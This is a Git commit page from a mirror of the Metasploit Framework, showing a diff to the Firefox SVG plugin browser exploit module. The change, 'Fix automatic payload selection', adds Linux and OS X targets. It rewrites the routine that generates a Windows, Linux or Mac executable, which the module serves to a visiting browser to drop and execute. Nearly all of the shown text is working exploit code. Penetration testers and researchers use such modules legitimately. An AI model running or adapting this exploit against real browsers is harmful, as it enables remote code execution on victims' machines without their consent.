infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix automatic payload selection

unstable
sinn3r 2013-05-22 22:37:18 -05:00
parent 23fe3146dc
commit 67861794f6
1 changed files with 25 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/exploits/multi/browser/firefox_svg_plugin.rb
View File

@ -33,12 +33,15 @@ class Metasploit3 < Msf::Exploit::Remote
with script access should be able to trigger it. with script access should be able to trigger it.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', {} ], [ 'Automatic',
[ {
'Windows x86 (Native Payload)', 'Platform' => ['win', 'linux', 'osx'],
'Arch' => ARCH_X86
}
],
[ 'Windows x86 (Native Payload)',
{ {
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86 'Arch' => ARCH_X86
@ -61,7 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Marius Mlynski', # discovery & bug report 'Marius Mlynski', # discovery & bug report
'joev' # metasploit module 'joev', # metasploit module
'sinn3r' # metasploit fu
], ],
'References' => 'References' =>
[ [
@ -98,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
elsif request.uri =~ /\.bin/ elsif request.uri =~ /\.bin/
# send the binary payload to drop & exec # send the binary payload to drop & exec
print_status("Child frame navigated. Sending binary payload to drop & execute.") print_status("Child frame navigated. Sending binary payload to drop & execute.")
send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' }) send_response(cli, dropped_file_contents(cli, target), { 'Content-Type' => 'application/octet-stream' })
else else
# send initial HTML page # send initial HTML page
print_status("Target selected: #{target.name}") print_status("Target selected: #{target.name}")
@ -109,9 +113,22 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# @return [String] the encoded executable for dropping onto the client's machine # @return [String] the encoded executable for dropping onto the client's machine
def dropped_file_contents(cli) def dropped_file_contents(cli, target)
return if ((p=regenerate_payload(cli)) == nil) return if ((p=regenerate_payload(cli)) == nil)
generate_payload_exe( {:code=>p.encoded} ) opts = target.opts
exe = ''
case target.name
when /windows/i
opts = opts.merge({:code=>p.encoded})
exe = generate_payload_exe(opts)
when /linux/i
exe = Msf::Util::EXE.to_linux_x86_elf(framework, p.encoded, opts)
when /os x/i
exe = Msf::Util::EXE.to_osx_x86_macho(framework, p.encoded, opts)
end
return exe
end end
# @return [Msf::Module::Target] that matches the client's user-agent header # @return [Msf::Module::Target] that matches the client's user-agent header